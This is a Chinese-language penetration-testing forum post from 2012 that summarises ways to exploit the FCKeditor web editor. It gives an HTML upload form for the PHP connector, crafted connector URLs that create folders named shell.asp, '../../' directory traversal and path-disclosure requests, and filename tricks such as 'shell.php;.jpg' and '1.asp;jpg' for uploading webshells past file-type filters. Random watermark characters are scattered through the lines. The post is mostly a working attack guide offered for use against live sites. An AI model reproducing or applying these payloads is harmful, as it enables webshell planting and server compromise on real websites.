找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Fckeditor漏洞 (2)
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2473|回复: 0
打印 上一主题 下一主题

Fckeditor漏洞 (2)

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:01:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Fckeditor漏洞利用总结  
- c" E' A5 X4 j8 `. _5 r5 ?查看编辑器版本
- m0 T! `! Q$ e2 _3 S( K& ~FCKeditor/_whatsnew.html
' j* q6 Q" q3 p: _2 q' I! X—————————————————————————————————————————————————————————————
! w, M7 i9 t- k+ B2 S( t8 t. L3 w2 |
2. Version 2.2 版本
9 }; y5 J8 q$ C+ G. U( W5 s8 eApache+linux 环境下在上传文件后面加个.突破!测试通过。
# c0 y% Y2 b) W9 i* `2 V* ]0 M% j—————————————————————————————————————————————————————————————
; S( @% C! i* C* v
% G1 R* e4 [% o! N6 `0 M+ Q& {3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
8 M- }6 _1 ]9 X. D) {<form id="frmUpload" enctype="multipart/form-data"& R8 R. L" f; b" t( d
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
4 x, F: e: u, [+ L! T, j- E<input type="file" name="NewFile" size="50"><br>
  ^+ r( L: b& |; b; ^2 V- c# w3 {$ v, o<input id="btnUpload" type="submit" value="Upload">$ @7 F+ @; G5 N% I
</form>% A7 |4 L- t2 d: U# b" Z) O
—————————————————————————————————————————————————————————————+ G4 u$ n7 @1 ^3 ?1 e1 Q8 C

2 m* `" z0 u3 E/ \- p4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
9 u: A9 i  N! ]# d8 i- M" f        很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
0 m) u1 F( }1 a* e, ~    4.1:提交shell.php+空格绕过
4 C7 i2 I# f/ M) [不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。, o/ C( ?5 I8 _
    4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
1 V; N- Y) T6 p—————————————————————————————————————————————————————————————$ B! H2 v7 z/ r* O

& f) `0 Y5 N! t' n- O7 v5. 突破建立文件夹
6 @! T* v8 b$ g9 Q8 RFCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=12447899756848 b% X9 U+ V4 P% X/ e5 ]
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp( N% z9 h8 n6 u8 D2 [
—————————————————————————————————————————————————————————————+ w7 n- B7 H! H3 H

  |: P; L/ r: T7 D4 {6. FCKeditor 中test 文件的上传地址, V6 Z8 c5 T( b9 T( D7 j5 X- _/ J
FCKeditor/editor/filemanager/browser/default/connectors/test.html
( ~2 j: ]  l9 ~6 F6 s5 cFCKeditor/editor/filemanager/upload/test.html. B; n1 k0 g0 L8 j% H) ^: ^* F
FCKeditor/editor/filemanager/connectors/test.html
4 ?% O5 d- x3 A3 [FCKeditor/editor/filemanager/connectors/uploadtest.html) L+ D- b! H# L( f* |
—————————————————————————————————————————————————————————————
1 {5 k* z7 i6 t" `5 x: m; L, k9 ]  q' ^
7.常用上传地址
  q. G/ s# T* ^0 ~FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/0 A5 h6 `( K2 w7 d( K/ F0 i0 A1 e2 b
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp7 A( m; X% F% X+ d& v! ~
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
: y  e  N3 _/ n8 }, sJSP 版:
4 p2 C3 q7 g1 }( k) {FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp" I& N$ T# n, ^) e  s
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
3 E' _+ E5 ?# E9 F+ y0 D件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。# e5 U& j0 i. L2 L8 Q
—————————————————————————————————————————————————————————————) U$ U" Q4 d; r* B0 K! V& h
* z% ?- I2 m+ y( d, h
8.其他上传地址$ p7 ~+ @3 D9 ^  w" w) S
FCKeditor/_samples/default.html8 v7 A8 H7 L* M  L9 \0 u' n2 o- l
FCKeditor/_samples/asp/sample01.asp% e* X$ m1 g' C; W* m
FCKeditor/_samples/asp/sample02.asp
9 C" s; w/ }1 |% K8 BFCKeditor/_samples/asp/sample03.asp
' J. o" L6 R4 c1 vFCKeditor/_samples/asp/sample04.asp
; w$ ~7 }4 q* ]9 T' a一般很多站点都已删除_samples 目录,可以试试。; k& h+ e5 c5 [( b+ r" D3 d
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。( C  I  B. q' j" O  W8 q9 C
—————————————————————————————————————————————————————————————3 |- O8 G$ n' U- s5 l
0 B1 G" D& u" c: b
9.列目录漏洞也可助找上传地址
' ?: S+ h0 G9 f  J" UVersion 2.4.1 测试通过
) c' D% K) R. o) U修改CurrentFolder 参数使用 ../../来进入不同的目录  T6 F* m' v1 L: Q4 }$ w- l( M
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp8 p: y0 z5 k( u+ r* Y3 K( ]- n) p
根据返回的XML 信息可以查看网站所有的目录。
* o4 b# \! G; j$ w( J4 nFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F$ ?' f1 c& y, q
也可以直接浏览盘符:
& y' j% l2 L$ g3 K. }JSP 版本:% G1 m+ R- X. C8 ~8 ]0 x' f
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F; d+ k- S+ \: T+ W6 z; F! y! T/ e
—————————————————————————————————————————————————————————————+ `, c" F4 o, n" ^
4 ~6 a, m% \* o
10.爆路径漏洞
) B3 }" ^. N: |# ^FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp& v: L' z! I4 x9 G  }
—————————————————————————————————————————————————————————————
' i! Z6 J9 J0 L" z  _1 B8 n: B/ D" l+ L& W  P
11. FCKeditor 被动限制策略所导致的过滤不严问题9 w- w9 i3 }5 u4 H. B' g
        影响版本: FCKeditor x.x <= FCKeditor v2.4.3
! }# p; l. _+ S% E/ k脆弱描述:5 y+ `# }+ x, g7 k6 j' j
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:$ [" i8 M9 G6 a7 |! S
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm- J5 [; @; r' P) o& a# N3 B4 x2 D
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
4 X* J2 l1 n* Y! R% i- G        而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
4 I7 e: S  i; R; V& j7 j        在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!& X* S6 W, T0 a# V' g% S" K
—————————————————————————————————————————————————————————————
& B+ u( i0 r' O
1 P, g; J7 J# X2 s- w12.最古老的漏洞,Type文件没有限制!
% B5 p% L: C1 i" M' S# t; h        我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本! 1 D7 E& A' U% K. X
—————————————————————————————————————————————————————————————
1 o# @0 q+ ~- j6 _1 \1 a
4 f0 O/ B; d9 r! t! O% H===============================================================================================================================================: O/ s) ?0 H0 H0 W0 B) U' d' }
6 P  N6 R& C. F; |/ j( H  |! v5 v# I
FCK编辑器jsp版本漏洞:
) Q: I# N- O  z- S8 ]  Y  u3 l4 U$ e& w) V6 F/ k
& i* Z% O1 _5 n6 S: Y
http://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F
3 F8 [) T' D. Y4 L" o; [- I! h# {$ J2 S% y
上传马所在目录
4 @* |8 }' t7 j$ B# z8 v5 x1 o- JFCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
- P. s: R8 A6 Q( a' h上传shell的地址:
4 X. q6 L, s8 mhttp://www.xxx.com/fckeditor/edi ... ctors/jsp/connector" o3 F2 e7 a- |7 l/ F
跟版本有关系.并不是百分百成功. 测试成功几个站.8 h9 x$ f6 A  L: }1 G
不能通杀.很遗憾.
# }, ~& c/ T2 _5 Phttp://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector0 s4 P2 N3 H  w0 l
如果以上地址不行可以试试: ]. ^+ R  p5 A# V: W9 H! \  W
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector- s7 o9 ~1 @/ N4 f1 W$ ~3 Y
FCKeditor/_samples/+ H7 a( n  i8 M, s5 ]0 u
FCKeditor/_samples/default.html! Y5 i, o2 P4 g$ [' @9 E. F* ~
FCKeditor/editor/fckeditor.htm. E4 T- M4 S5 K% _6 T6 f
FCKeditor/editor/fckdialog.html% h$ u, s- e8 Z2 C/ o& N( d2 V

% S/ X+ o2 e- S1 }# A9 p1 B$ \3 Q) A

( ]/ V7 [2 y$ d& y解析漏洞+未重命名文件时上传漏洞  1.asp;jpg9 w6 u0 j/ u' R0 G! Z: `9 w
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表